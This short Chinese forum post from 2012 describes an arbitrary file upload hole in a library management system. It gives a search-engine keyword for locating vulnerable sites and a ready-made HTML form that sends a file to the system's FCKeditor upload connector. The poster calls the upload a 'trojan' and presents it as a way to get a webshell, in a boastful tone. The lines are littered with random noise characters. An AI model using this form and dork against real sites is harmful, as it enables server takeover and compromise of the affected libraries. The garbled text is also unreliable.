主题:图书馆系统任意文件上传漏洞$ z% X6 Q. n) o r8 H% u, `
作者:冰锋刺客 Y* g. Z' L8 {* y- ]3 H
厂商:点击书(dianjishu.com): M$ q6 x, _+ ?0 e$ y
日期:2012-6-21
- o4 O8 B5 w! `- [1 @ / g& U4 U! ]' S% f3 W( Y: d
I 概述
0 w- ^% L4 R* g1 J1 [ 点点书库图书馆系统存在文件上传漏洞,导致可以直接拿webshell
& y$ o5 x0 D! S& D8 ~ II 简介
& c J I$ g! M6 A 关键词:"Copyright (C) 点点电子书库 2009-2010, All Rights Reserved"
4 r0 A3 u2 G9 N3 D" x 补充一个漏洞
8 \& b4 Q2 @( L <form id="frmUpload" enctype="multipart/form-data"
; L% s/ U3 p- z, W$ p action="http://url/admin/js/fckeditor/editor/filemanager/connectors/aspx/upload.aspx?Type=Media" method="post">请上传您的马子<br><input type="file" name="NewFile" size="50"><br>/ M4 s2 |* j) w% k' v6 ]
<input id="btnUpload" type="submit" value="操翻他">
( h" f$ o+ x0 Z* i& d' Y </form>
7 ~1 [' g c0 t4 E1 ]1 D4 w 你们懂的2 c f' K2 A9 {9 d
那傻逼提供还需要改包.% S9 ^1 x( k3 y: j. u
自己看了下源代码发现fckeditor
, P# Z/ c) ~* B7 {. W( d z1 V7 d 直接秒杀
, [1 J7 b2 H! `+ { |
发表于 2012-9-10 21:20:59
收藏
支持
反对